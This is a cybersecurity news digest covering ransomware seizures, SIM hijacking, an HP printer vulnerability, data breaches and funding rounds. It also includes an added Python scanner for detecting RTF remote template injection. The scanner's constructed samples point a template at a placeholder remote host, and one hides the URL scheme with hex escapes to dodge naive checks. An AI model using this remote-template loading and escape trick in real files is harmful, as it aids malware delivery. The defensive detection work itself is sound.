FBI Seizes $2.3 Million in Bitcoin From REvil and GandCrab Affiliate
SIM hijacking defendant sentenced to ten months, HP issues security updates, 1,803 money mules busted, DNA testing company hacked, tens of thousands of Iranians targeted in theft scheme, more
It’s the giving season. Consider giving a colleague or friend a premium subscription to Metacurity.
In an unsealed complaint, the FBI said it seized 39.89138522 bitcoins worth approximately $2.3 million at current prices ($1.5 million at time of seizure) from the Exodus wallet of a well-known REvil and GandCrab ransomware affiliate on August 3rd, 2021.
The complaint states that the wallet contained REvil ransom payments belonging to an affiliate identified as "Aleksandr Sikerin, a/k/a Alexander Sikerin, a/k/a Oleksandr Sikerin" with an email address of 'firstname.lastname@example.org.' (Lawrence Abrams / Bleeping Computer)
A recently discovered FBI training document obtained by U.S. nonprofit group Property of the People shows that U.S. law enforcement can gain limited access to the content of encrypted messages from secure messaging services such as iMessage, Line, and WhatsApp, but not to messages sent via Signal, Telegram, Threema, Viber, WeChat, or Wickr.
The document doesn’t contain any new information but does provide an up-to-date summary of what type of information the FBI can currently obtain from each of the listed services. (Catalin Cimpanu / The Record)
PropertyOfThePeople (@PropOTP): We got an FBI training doc on obtaining data from secure messaging apps, and shared it w/ @AndyKroll/@RollingStone. #FOIA https://t.co/FcjEUV1sN3
Garrett Endicott, the sixth and final defendant in a gang called “The Community,” accused of perpetrating a multimillion-dollar SIM hijacking case, was sentenced to 10 months in prison and ordered to pay more than $121,000 in restitution.
The Community engaged in a string of SIM hijacking incidents targeting individual users’ cryptocurrency exchange accounts in seven states. Endicott was indicted in 2019 along with five others, four of whom were sentenced to two to four years in prison and one who was given probation. (A.J. Vicens / Cyberscoop)
Twitter said that although the sharing of private media can impact anyone, it "can have a disproportionate effect on women, activists, dissidents, and members of minority communities." If someone reports a photo or video that violates the policy, Twitter will remove the media and take action based on its enforcement options. (Kris Holt / Engadget)
Related: Teller Report, Quartz, Protocol, Twitter, Gadgets Now, The Hacker News, Asia One Digital, ZDNet, TheDigitalHacker, TechWorm, Candid.Technology, MediaNama, The South African, Gadgets Now, Techradar, Silicon Republic, Pocket-lint, The Mac Observer
Hewlett Packard released security updates earlier this month to address a vulnerability that impacts more than 150 models from the company’s line of multi-functional printers.
The vulnerability (CVE-2021-39238) can be used to create wormable exploits that can self-replicate and spread to other HP printers inside internal networks or over the internet. (Catalin Cimpanu / The Record)
In a rare speech, Britain’s foreign intelligence chief Richard Moore warned about the spread of Chinese surveillance technology, which he said is used in “targeting the Uyghur population in Xinjiang.” He also said the U.K. needed to recognize that “technologies of control are being increasingly exported to other governments.”
One point raised by Moore in an earlier BBC interview is China’s use of “data traps,” which is “If you allow another country to gain access to really critical data about your society, over time that will erode your sovereignty, you no longer have control over that data.” (Dan Sabbagh / The Guardian)
Europol announced the arrest of 1,803 money mules out of 18,351 identified following an international money-laundering crackdown operation codenamed EMMA (European Money Mule Action) 7.
The operation relied on a large-scale collaboration of law enforcement agencies in 27 countries between September 15 and November 30, 2021. (Bill Toulas / Bleeping Computer)
An Ohio-based DNA testing company, DNA Diagnostics Center (DDC), disclosed a hacking incident that affected 2,102,436 persons.
The incident occurred between May 24, 2021, and July 28, 2021, and the firm concluded its internal investigation on October 29, 2021. The data accessed during the incident are full names, credit and debit card numbers plus CVVs, financial account numbers, and platform account passwords. (Bill Toulas / Bleeping Computer)
Researchers at Check Point discovered evidence that tens of thousands of Iranians had been targeted in a financial theft scheme involving hackers sending texts to Android users that impersonated branches of the Iranian government.
The average victim lost between $1,000 and $2,000, and the Check Point researchers found that the stolen data was easily accessible online to third parties. (Maggie Miller / The Hill)
Related: Check Point
Researchers at Proofpoint say that advanced persistent threat (APT) groups from China, Russia, and India have this year adopted a new attack technique called “RTF Template Injection,” which has made their attacks harder to detect and stop.
The technique abuses a Microsoft Office feature that lets users create a document from a pre-defined template. These templates can be stored locally or downloaded from a remote server, which is the basis of attacks known as “remote template injections.” Proofpoint says the threat actors put together RTF files with lures that may interest their targets, craft a template containing malicious code that runs malware, and edit the RTF files so that the template is loaded when the file is opened. (Catalin Cimpanu / The Record)
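As an added illustration of what a defender can look for in this kind of file (this is example code written for this summary, not code from Proofpoint, The Record, or any other cited source), the following Python scanner pulls the `\*\template` destination out of RTF text and flags references that point to a remote location rather than a local template file. The sample RTF documents are constructed for the example, and `template-server.example` is a placeholder host, not an indicator from any report.

```python
"""
Scan RTF text for template destinations and flag remote ones.

RTF stores the document template name in the {\*\template ...} destination
(RTF specification). A benign template is normally a local path; a
template that resolves to a URL or UNC path is worth a closer look.
Added example; the sample documents below are constructed.
"""
import re

# One regex tokenises the destination body so that RTF escapes are undone
# before the text is inspected: \'hh hex bytes, \\ \{ \} escaped characters,
# control words (dropped) and control symbols (dropped).
_TOKEN = re.compile(
    r"\\'(?P<hex>[0-9A-Fa-f]{2})"        # hex-encoded byte, e.g. \'68 -> 'h'
    r"|\\(?P<esc>[\\{}])"                # escaped backslash or brace
    r"|\\(?P<word>[A-Za-z]+-?\d*) ?"     # control word (trailing space is the delimiter)
    r"|\\(?P<sym>[^A-Za-z])"             # other control symbol
    r"|(?P<brace>[{}])"                  # group braces carry no text
    r"|(?P<text>[^\\{}]+)"               # plain text
)

# Start of a template destination: "{\*\template" (or "{\template"), where the
# control word must end at a non-letter, as the RTF grammar requires.
_TEMPLATE_START = re.compile(r"\{(?:\\\*)?\\template(?![A-Za-z])")

# Destinations that resolve somewhere other than the local file system.
_REMOTE = re.compile(r"^(?:https?://|ftp://|\\\\)", re.IGNORECASE)


def _decode_destination(body: str) -> str:
    """Turn the raw RTF inside a destination group into the text it encodes."""
    out = []
    for m in _TOKEN.finditer(body):
        if m.group("hex"):
            out.append(chr(int(m.group("hex"), 16)))
        elif m.group("esc"):
            out.append(m.group("esc"))
        elif m.group("text"):
            out.append(m.group("text"))
        # control words, control symbols and braces contribute no text
    return "".join(out).strip()


def find_template_destinations(rtf: str) -> list[str]:
    """Return the decoded text of every template destination in the RTF."""
    results = []
    for m in _TEMPLATE_START.finditer(rtf):
        depth, i, start = 1, m.end(), m.end()
        # Walk to the brace that closes this group, skipping escaped characters
        # so that \{ and \} inside the destination are not counted.
        while i < len(rtf) and depth:
            c = rtf[i]
            if c == "\\":
                i += 2
                continue
            if c == "{":
                depth += 1
            elif c == "}":
                depth -= 1
            i += 1
        if depth == 0:
            results.append(_decode_destination(rtf[start:i - 1]))
    return results


def classify_template(destination: str) -> str:
    """'remote' for URL/UNC references, 'local' for anything else."""
    return "remote" if _REMOTE.match(destination) else "local"


def scan_rtf(rtf: str) -> list[dict]:
    """Return one verdict per template destination found in the document."""
    return [{"template": d, "verdict": classify_template(d)}
            for d in find_template_destinations(rtf)]


# Constructed sample documents (not real samples): no template, a local
# template, a remote template, and a remote template whose scheme is written
# with hex escapes so a naive substring search for "http" would miss it.
SAMPLE_CLEAN = r"{\rtf1\ansi Hello world}"
SAMPLE_LOCAL = r"{\rtf1\ansi{\*\template C:\\Templates\\Normal.dotm}Body}"
SAMPLE_REMOTE = r"{\rtf1\ansi{\*\template http://template-server.example/t.dotm}Body}"
SAMPLE_HEX = r"{\rtf1\ansi{\*\template \'68\'74\'74\'70://template-server.example/t.dotm}Body}"

if __name__ == "__main__":
    for name, doc in [("clean", SAMPLE_CLEAN), ("local", SAMPLE_LOCAL),
                      ("remote", SAMPLE_REMOTE), ("hex", SAMPLE_HEX)]:
        print(name, scan_rtf(doc))
```

The scanner decodes RTF escapes before looking at the destination, which is why the hex-escaped sample is still classified as remote; a detection that only greps the raw bytes for a URL scheme would not see it. Treat a remote verdict as a triage signal rather than proof of malice, since legitimate documents can reference templates on internal file shares.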
As several organizations stress, the use of the term “blacklist,” common in cybersecurity, carries a tone of racial exclusivity, equating “black” with bad.
Many experts suggest the time has come to replace the term “blacklist” with the more neutral “denylist.” (Lorenzo Franceschi-Bicchierai / Motherboard)
According to Finnish press reports, a Finnish court ruled that chat messages secretly gathered by the FBI from encrypted phone company Anom can’t be used as evidence against two particular suspects.
Anom was an encrypted phone company whose convicted drug-trafficker owner provided devices to the FBI in 2018. The FBI and the Australian police surreptitiously surveilled messages sent over the devices. (Joseph Cox / Motherboard)
An AI-driven hardware security company has announced the closing of an oversubscribed Series B funding round at $25 million.
Dennis Anthony H. Uy and Series A investor Orbit Venture Partners led the round, supplemented by a group of individual investors, including Dave Welch, Founder of Infinera, and Dick Kramlich, Chairman Emeritus of New Enterprise Associates (NEA) and General Partner of Green Bay Ventures. (Security Week)
Related: Business Wire
Automated privacy risk detection company Soveren has raised $6.5 million in a Seed funding round.
first minute capital led the round and was joined by Northzone, 11 unicorn founders, and a group of global CEOs. The founders of Airbnb, Datadog, MuleSoft, Snyk, and Color invested alongside Sir Richard Branson’s family, the Chairman and CEO of Palo Alto Networks, and others. (Carly Page / TechCrunch)